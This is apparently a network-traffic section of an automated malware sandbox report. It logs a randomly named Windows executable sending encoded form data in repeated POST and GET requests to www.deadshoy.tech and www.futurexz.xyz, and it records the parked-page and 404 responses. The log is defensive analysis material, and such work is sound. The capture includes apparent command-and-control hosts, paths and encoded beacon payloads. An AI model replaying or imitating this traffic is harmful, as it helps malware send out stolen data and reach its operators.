Jan 11, 2025 05:43:23.393897057 CET	1236	IN	HTTP/1.1 200 OK date: Sat, 11 Jan 2025 04:43:22 GMT content-type: text/html; charset=utf-8 content-length: 1118 x-request-id: a457dd99-2bc6-4ba1-bf99-be3ef6358396 cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_nte2z7tCrlzFXCigfot4wjAAdwL/op1v0EoTBCpjEFS085r+86zDhoLnvz+FaMXaecenbeGIvkw2d3wq9/FBig== set-cookie: parking_session=a457dd99-2bc6-4ba1-bf99-be3ef6358396; expires=Sat, 11 Jan 2025 04:58:23 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 6e 74 65 32 7a 37 74 43 72 6c 7a 46 58 43 69 67 66 6f 74 34 77 6a 41 41 64 77 4c 2f 6f 70 31 76 30 45 6f 54 42 43 70 6a 45 46 53 30 38 35 72 2b 38 36 7a 44 68 6f 4c 6e 76 7a 2b 46 61 4d 58 61 65 63 65 6e 62 65 47 49 76 6b 77 32 64 33 77 71 39 2f 46 42 69 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_nte2z7tCrlzFXCigfot4wjAAdwL/op1v0EoTBCpjEFS085r+86zDhoLnvz+FaMXaecenbeGIvkw2d3wq9/FBig==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Jan 11, 2025 05:43:23.393950939 CET	571	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYTQ1N2RkOTktMmJjNi00YmExLWJmOTktYmUzZWY2MzU4Mzk2IiwicGFnZV90aW1lIjoxNzM2NTcwNj

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49987	199.59.243.228	80	5068	C:\Program Files (x86)\GlvujUmSQPSFYAmhfKWhnapJquKSJbOyxJDLzXuOFxYfjXNiFgQBTBfkYYV\yAMzZKaZoBLE.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 05:43:25.472826958 CET	1831	OUT	POST /k45z/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-us Connection: close Cache-Control: no-cache Content-Length: 1239 Content-Type: application/x-www-form-urlencoded Host: www.deadshoy.tech Origin: http://www.deadshoy.tech Referer: http://www.deadshoy.tech/k45z/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; SGH-M919 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36 Data Raw: 4b 64 3d 4b 6a 48 56 4c 33 65 45 6c 66 44 53 32 47 36 37 43 6a 77 4b 73 73 57 4d 6c 32 4b 70 36 39 7a 56 64 32 62 6b 48 63 2b 58 38 38 71 42 43 46 69 34 68 38 6c 41 73 7a 6a 46 75 6d 65 32 54 62 77 30 45 6c 47 35 7a 59 7a 54 6d 78 2f 4a 4f 76 47 6f 2b 72 35 31 35 2b 63 55 5a 50 2f 6e 78 4b 78 56 72 57 30 32 55 70 59 41 45 61 32 68 54 32 69 69 31 33 4b 36 63 78 77 52 68 38 4b 50 47 4c 6e 6c 78 37 34 70 62 78 31 76 66 54 6a 7a 69 32 68 39 47 5a 31 5a 36 41 59 5a 55 6b 51 47 70 67 69 5a 31 6f 51 64 71 2f 65 42 73 79 77 43 52 77 78 35 43 6f 2f 31 32 35 64 59 6d 69 6d 59 4a 4c 65 6a 73 7a 4d 31 47 4a 2f 64 4b 54 77 57 4d 75 39 61 59 4f 69 30 71 71 63 2b 44 69 2f 53 56 54 33 59 39 4d 50 35 6b 62 72 67 67 76 31 55 66 52 64 68 32 52 56 6e 2f 44 71 6a 33 53 50 52 6d 35 69 38 39 4b 4d 38 33 72 71 6c 51 33 54 47 74 43 6c 48 36 30 5a 7a 2b 6f 31 5a 65 32 4a 73 53 43 65 6c 6e 4f 6b 71 57 42 58 44 62 4e 54 70 75 42 57 55 62 69 50 4c 59 66 69 45 33 55 37 6e 73 67 75 72 78 78 56 62 73 79 42 63 6f 37 58 4c 59 6a 36 [TRUNCATED] Data Ascii: Kd=KjHVL3eElfDS2G67CjwKssWMl2Kp69zVd2bkHc+X88qBCFi4h8lAszjFume2Tbw0ElG5zYzTmx/JOvGo+r515+cUZP/nxKxVrW02UpYAEa2hT2ii13K6cxwRh8KPGLnlx74pbx1vfTjzi2h9GZ1Z6AYZUkQGpgiZ1oQdq/eBsywCRwx5Co/125dYmimYJLejszM1GJ/dKTwWMu9aYOi0qqc+Di/SVT3Y9MP5kbrggv1UfRdh2RVn/Dqj3SPRm5i89KM83rqlQ3TGtClH60Zz+o1Ze2JsSCelnOkqWBXDbNTpuBWUbiPLYfiE3U7nsgurxxVbsyBco7XLYj68BrU6nZWEnvq5Y+1gykOK83gfnLejXKaYq0K97lW7US4F7s9uxKRKGuNyIdmxm1YS1g1ub1umxpX5fzJ+FmWG6nHa4Ekek3j9XlM/hOkSWRmXLmCLyzK1W3JSby96LkX8hBjJz82+hss08OSAfv206Lo03TQ6VVlRFMkSdpPtJvLz2HMY50SdrSmEwg24DjGL9M07+eco26yvTw1hJ3NXAc24zQY9FctO0zN3T2T+nWer6c9JfROCPJI4KatyoMsIYfXRq8WD/iZ0qxz6c0Ic/pBWt1Hwj300dzckH7JVS+1unj9SbuHsThAA4I9p+PwsPoZPbZmyX3cwGZUjZW2Z5y5Nrl3LJxbVQK01maw9pGQGG42+P5M3ctqRvV43TSft/b1g/89jriDP0OFdzJ5U5saJTKOa4sTnJQtU9vHfdp1wxFf7wxGed5oixL1XdEy+/85CL83QvicKLcMbU62fsN79jSoTEn7vBLAji8x/0gV/ihwL9UEK7lJ5HNcW3dyfBfGu66acVY/dY/YNomlp+BPTLiAHFU7Ts9qZX5xLssVOJTFgjmOcfI+RhktR/RQiZvMjNsxZckJYmdRid3rvrDizzAQwc8V/Ryity6K7Kk8x7AromXs5rKL+lnsdlxV9CJG/9bbMMR+TfQpRAjZMs6ij+5OtmQq9V [TRUNCATED]
Jan 11, 2025 05:43:25.931045055 CET	1236	IN	HTTP/1.1 200 OK date: Sat, 11 Jan 2025 04:43:25 GMT content-type: text/html; charset=utf-8 content-length: 1118 x-request-id: 6130583a-efe5-4509-848c-eb3784e2ac02 cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_nte2z7tCrlzFXCigfot4wjAAdwL/op1v0EoTBCpjEFS085r+86zDhoLnvz+FaMXaecenbeGIvkw2d3wq9/FBig== set-cookie: parking_session=6130583a-efe5-4509-848c-eb3784e2ac02; expires=Sat, 11 Jan 2025 04:58:25 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 6e 74 65 32 7a 37 74 43 72 6c 7a 46 58 43 69 67 66 6f 74 34 77 6a 41 41 64 77 4c 2f 6f 70 31 76 30 45 6f 54 42 43 70 6a 45 46 53 30 38 35 72 2b 38 36 7a 44 68 6f 4c 6e 76 7a 2b 46 61 4d 58 61 65 63 65 6e 62 65 47 49 76 6b 77 32 64 33 77 71 39 2f 46 42 69 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_nte2z7tCrlzFXCigfot4wjAAdwL/op1v0EoTBCpjEFS085r+86zDhoLnvz+FaMXaecenbeGIvkw2d3wq9/FBig==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Jan 11, 2025 05:43:25.931076050 CET	571	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNjEzMDU4M2EtZWZlNS00NTA5LTg0OGMtZWIzNzg0ZTJhYzAyIiwicGFnZV90aW1lIjoxNzM2NTcwNj

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49988	199.59.243.228	80	5068	C:\Program Files (x86)\GlvujUmSQPSFYAmhfKWhnapJquKSJbOyxJDLzXuOFxYfjXNiFgQBTBfkYYV\yAMzZKaZoBLE.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 05:43:28.017335892 CET	536	OUT	GET /k45z/?Kd=Hhv1IBz65eD70HjhCg9ywsDykByP0cXiBlXjDO6l9OvALlXnnYphilqBzmviCqMlGACPw9TT4DmHF7/s/4BbtdMdJsOc8JxZhXcYSMMJNOepRHOr4zrtMEdCk8SbKI6tkg==&Gr=hRRPf2Bx HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Connection: close Host: www.deadshoy.tech User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; SGH-M919 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Jan 11, 2025 05:43:28.456906080 CET	1236	IN	HTTP/1.1 200 OK date: Sat, 11 Jan 2025 04:43:27 GMT content-type: text/html; charset=utf-8 content-length: 1478 x-request-id: f5f680e6-daf2-4356-8c8e-f3ac6b3ac90b cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_wjcsR7nut24MKn9cAhin6nHXQORYkhTko/hORa7tSDHW2XCiG3LWC3l5dz2ydB+FTVVAex1Gvktj6is+6wyodg== set-cookie: parking_session=f5f680e6-daf2-4356-8c8e-f3ac6b3ac90b; expires=Sat, 11 Jan 2025 04:58:28 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 77 6a 63 73 52 37 6e 75 74 32 34 4d 4b 6e 39 63 41 68 69 6e 36 6e 48 58 51 4f 52 59 6b 68 54 6b 6f 2f 68 4f 52 61 37 74 53 44 48 57 32 58 43 69 47 33 4c 57 43 33 6c 35 64 7a 32 79 64 42 2b 46 54 56 56 41 65 78 31 47 76 6b 74 6a 36 69 73 2b 36 77 79 6f 64 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_wjcsR7nut24MKn9cAhin6nHXQORYkhTko/hORa7tSDHW2XCiG3LWC3l5dz2ydB+FTVVAex1Gvktj6is+6wyodg==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Jan 11, 2025 05:43:28.456935883 CET	931	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZjVmNjgwZTYtZGFmMi00MzU2LThjOGUtZjNhYzZiM2FjOTBiIiwicGFnZV90aW1lIjoxNzM2NTcwNj

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49989	209.74.79.40	80	5068	C:\Program Files (x86)\GlvujUmSQPSFYAmhfKWhnapJquKSJbOyxJDLzXuOFxYfjXNiFgQBTBfkYYV\yAMzZKaZoBLE.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 05:43:41.575197935 CET	791	OUT	POST /bhaz/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-us Connection: close Cache-Control: no-cache Content-Length: 203 Content-Type: application/x-www-form-urlencoded Host: www.futurexz.xyz Origin: http://www.futurexz.xyz Referer: http://www.futurexz.xyz/bhaz/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; SGH-M919 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36 Data Raw: 4b 64 3d 51 31 71 65 48 54 46 4c 63 70 34 51 71 4c 69 73 30 6c 73 6d 48 73 37 78 75 63 35 74 51 61 4b 52 69 42 7a 57 39 4a 62 75 59 75 75 4f 76 39 63 50 6d 66 66 31 33 64 6f 34 79 75 61 39 74 76 37 79 55 6a 65 69 36 55 31 69 6c 6b 30 55 2b 49 72 4c 35 6e 69 61 76 2b 63 76 31 79 4a 6b 77 64 67 47 44 66 64 67 73 48 30 33 2b 6a 73 36 39 52 51 41 4a 4e 36 32 6c 69 75 69 62 6e 39 6c 5a 72 6a 45 4d 4b 75 4b 54 2f 75 2f 64 69 4f 6d 6c 77 2b 53 69 5a 56 6f 6a 4b 74 2f 6a 73 6d 49 51 57 46 30 63 55 37 6f 51 6a 77 62 64 58 43 44 76 35 67 79 6b 4b 32 50 76 6d 32 6b 73 4c 73 55 35 69 67 78 38 5a 6b 7a 4e 6a 73 3d Data Ascii: Kd=Q1qeHTFLcp4QqLis0lsmHs7xuc5tQaKRiBzW9JbuYuuOv9cPmff13do4yua9tv7yUjei6U1ilk0U+IrL5niav+cv1yJkwdgGDfdgsH03+js69RQAJN62liuibn9lZrjEMKuKT/u/diOmlw+SiZVojKt/jsmIQWF0cU7oQjwbdXCDv5gykK2Pvm2ksLsU5igx8ZkzNjs=
Jan 11, 2025 05:43:42.146480083 CET	533	IN	HTTP/1.1 404 Not Found Date: Sat, 11 Jan 2025 04:43:42 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	49990	209.74.79.40	80	5068	C:\Program Files (x86)\GlvujUmSQPSFYAmhfKWhnapJquKSJbOyxJDLzXuOFxYfjXNiFgQBTBfkYYV\yAMzZKaZoBLE.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 05:43:44.129921913 CET	811	OUT	POST /bhaz/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-us Connection: close Cache-Control: no-cache Content-Length: 223 Content-Type: application/x-www-form-urlencoded Host: www.futurexz.xyz Origin: http://www.futurexz.xyz Referer: http://www.futurexz.xyz/bhaz/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; SGH-M919 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36 Data Raw: 4b 64 3d 51 31 71 65 48 54 46 4c 63 70 34 51 71 72 79 73 34 6c 51 6d 46 4d 37 32 69 38 35 74 5a 36 4b 64 69 42 2f 57 39 4e 43 31 5a 61 43 4f 76 64 4d 50 6e 61 72 31 30 64 6f 34 39 4f 61 43 77 2f 37 70 55 6a 53 45 36 58 74 69 6c 6b 51 55 2b 4d 76 4c 34 57 69 64 75 75 64 4a 7a 79 4a 6d 74 4e 67 47 44 66 64 67 73 48 67 64 2b 6a 30 36 39 45 41 41 50 63 36 31 73 43 75 39 4d 58 39 6c 4f 62 6a 41 4d 4b 75 34 54 2b 43 42 64 6b 4b 6d 6c 78 4f 53 69 6f 56 6e 70 4b 74 39 2b 63 6e 33 66 69 4a 35 46 47 47 6e 56 69 70 6f 4a 33 4f 5a 71 50 52 59 2b 6f 2b 6e 38 47 61 63 38 59 6b 6a 6f 53 42 59 6d 36 30 44 54 30 34 55 4b 56 38 41 6a 39 50 66 6a 31 7a 4a 32 2f 41 57 6d 53 66 49 Data Ascii: Kd=Q1qeHTFLcp4Qqrys4lQmFM72i85tZ6KdiB/W9NC1ZaCOvdMPnar10do49OaCw/7pUjSE6XtilkQU+MvL4WiduudJzyJmtNgGDfdgsHgd+j069EAAPc61sCu9MX9lObjAMKu4T+CBdkKmlxOSioVnpKt9+cn3fiJ5FGGnVipoJ3OZqPRY+o+n8Gac8YkjoSBYm60DT04UKV8Aj9Pfj1zJ2/AWmSfI
Jan 11, 2025 05:43:44.699860096 CET	533	IN	HTTP/1.1 404 Not Found Date: Sat, 11 Jan 2025 04:43:44 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	49991	209.74.79.40	80	5068	C:\Program Files (x86)\GlvujUmSQPSFYAmhfKWhnapJquKSJbOyxJDLzXuOFxYfjXNiFgQBTBfkYYV\yAMzZKaZoBLE.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 05:43:46.678530931 CET	1828	OUT	POST /bhaz/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-us Connection: close Cache-Control: no-cache Content-Length: 1239 Content-Type: application/x-www-form-urlencoded Host: www.futurexz.xyz Origin: http://www.futurexz.xyz Referer: http://www.futurexz.xyz/bhaz/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; SGH-M919 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36 Data Raw: 4b 64 3d 51 31 71 65 48 54 46 4c 63 70 34 51 71 72 79 73 34 6c 51 6d 46 4d 37 32 69 38 35 74 5a 36 4b 64 69 42 2f 57 39 4e 43 31 5a 61 4b 4f 75 72 41 50 6d 35 44 31 31 64 6f 34 6a 65 61 48 77 2f 36 7a 55 69 36 59 36 51 6c 79 6c 6d 34 55 2f 70 37 4c 70 55 4b 64 68 75 64 4a 78 79 4a 6e 77 64 67 54 44 66 4e 38 73 48 77 64 2b 6a 30 36 39 46 77 41 5a 39 36 31 67 69 75 69 62 6e 38 78 5a 72 6a 6b 4d 4a 65 53 54 2b 32 52 64 58 43 6d 6b 52 65 53 78 75 42 6e 71 71 74 7a 75 4d 6e 76 66 6c 41 35 46 43 6e 59 56 69 64 43 4a 30 75 5a 75 61 38 79 6a 4c 66 36 74 58 4f 35 2b 37 51 30 30 31 4a 6d 2b 70 55 46 4f 47 73 6e 4a 6b 45 6a 68 35 33 59 31 56 6d 64 76 35 67 77 6b 31 43 36 6b 39 2f 4f 76 6d 4e 6d 74 6e 4b 73 43 47 55 32 4c 4f 63 61 48 62 55 67 76 64 52 36 78 4c 64 54 71 68 6d 70 55 74 46 38 39 62 30 4f 52 44 31 2f 4e 47 58 32 4b 74 67 38 57 64 54 32 6c 53 47 73 4e 47 41 49 33 6a 65 51 38 63 45 6a 56 39 43 39 50 69 6d 67 73 46 77 48 57 53 4a 5a 63 67 36 68 30 59 5a 4d 46 4b 78 37 33 68 48 39 48 31 72 73 6d 2b 2f [TRUNCATED] Data Ascii: 